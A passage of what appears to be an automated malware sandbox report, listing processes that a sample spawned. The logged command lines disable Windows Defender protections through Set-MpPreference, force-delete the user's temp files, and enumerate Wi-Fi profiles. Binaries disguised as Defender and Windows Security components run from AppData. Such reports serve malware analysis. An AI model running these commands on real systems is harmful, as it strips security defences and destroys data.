                                                  Has exited:true

                                                  General

                                                  Target ID:33
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:34
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:35
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:36
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:37
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:38
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:39
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:40
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:41
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:42
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:43
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:44
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:45
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:46
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:47
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:48
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:49
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:50
                                                  Start time:00:16:09
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:51
                                                  Start time:00:16:09
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:52
                                                  Start time:00:16:09
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:53
                                                  Start time:00:16:09
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:54
                                                  Start time:00:16:09
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:55
                                                  Start time:00:16:10
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:56
                                                  Start time:00:16:10
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:58
                                                  Start time:00:16:14
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                                                  Imagebase:0x2a0000
                                                  File size:44'032 bytes
                                                  MD5 hash:5322A12CB24E83BFA9746FBDE06D07E7
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:59
                                                  Start time:00:16:26
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                                                  Imagebase:0x190000
                                                  File size:44'032 bytes
                                                  MD5 hash:5322A12CB24E83BFA9746FBDE06D07E7
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:60
                                                  Start time:00:16:34
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:61
                                                  Start time:00:16:34
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:62
                                                  Start time:00:16:34
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\user\AppData\Local\Temp\*
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:63
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:64
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:65
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:66
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:67
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                  Wow64 process (32bit):true
                                                  Commandline:chcp 65001
                                                  Imagebase:0xb10000
                                                  File size:12'800 bytes
                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:68
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                  Wow64 process (32bit):true
                                                  Commandline:chcp 65001
                                                  Imagebase:0xb10000
                                                  File size:12'800 bytes
                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:69
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:netsh wlan show profile
                                                  Imagebase:0x1080000
                                                  File size:82'432 bytes
                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:70
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:netsh wlan show profile
                                                  Imagebase:0x1080000
                                                  File size:82'432 bytes
                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:71
                                                  Start time:00:16:35
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr All
                                                  Imagebase:0xe40000
                                                  File size:29'696 bytes
                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:72
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr All
                                                  Imagebase:0xe40000
                                                  File size:29'696 bytes
                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:73
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:74
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:75
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:76
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:77
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                  Wow64 process (32bit):true
                                                  Commandline:chcp 65001
                                                  Imagebase:0xb10000
                                                  File size:12'800 bytes
                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:78
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                  Wow64 process (32bit):true
                                                  Commandline:chcp 65001
                                                  Imagebase:0xb10000
                                                  File size:12'800 bytes
                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:79
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:netsh wlan show networks mode=bssid
                                                  Imagebase:0x1080000
                                                  File size:82'432 bytes
                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:80
                                                  Start time:00:16:36
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:netsh wlan show networks mode=bssid
                                                  Imagebase:0x1080000
                                                  File size:82'432 bytes
                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:82
                                                  Start time:00:16:40
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Dol1ysW8Xfj9.bat" "
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:83
                                                  Start time:00:16:40
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:84
                                                  Start time:00:16:41
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                  Wow64 process (32bit):true
                                                  Commandline:chcp 65001
                                                  Imagebase:0xb10000
                                                  File size:12'800 bytes
                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:85
                                                  Start time:00:16:41
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x830000
                                                  File size:18'944 bytes
                                                  MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:87
                                                  Start time:00:16:50
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\Window Security.exe"
                                                  Imagebase:0x590000
                                                  File size:547'328 bytes
                                                  MD5 hash:81B2C5C64951B603480D40D321540FF2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:88
                                                  Start time:00:16:53
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CMaYLAcPq0sZ.bat" "
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:89
                                                  Start time:00:16:53
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:90
                                                  Start time:00:16:53
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                  Wow64 process (32bit):true
                                                  Commandline:chcp 65001
                                                  Imagebase:0xb10000
                                                  File size:12'800 bytes
                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:91
                                                  Start time:00:16:53
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x830000
                                                  File size:18'944 bytes
                                                  MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:92
                                                  Start time:00:17:01
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                                                  Imagebase:0x870000
                                                  File size:44'032 bytes
                                                  MD5 hash:5322A12CB24E83BFA9746FBDE06D07E7
                                                  Has elevated privileges:true
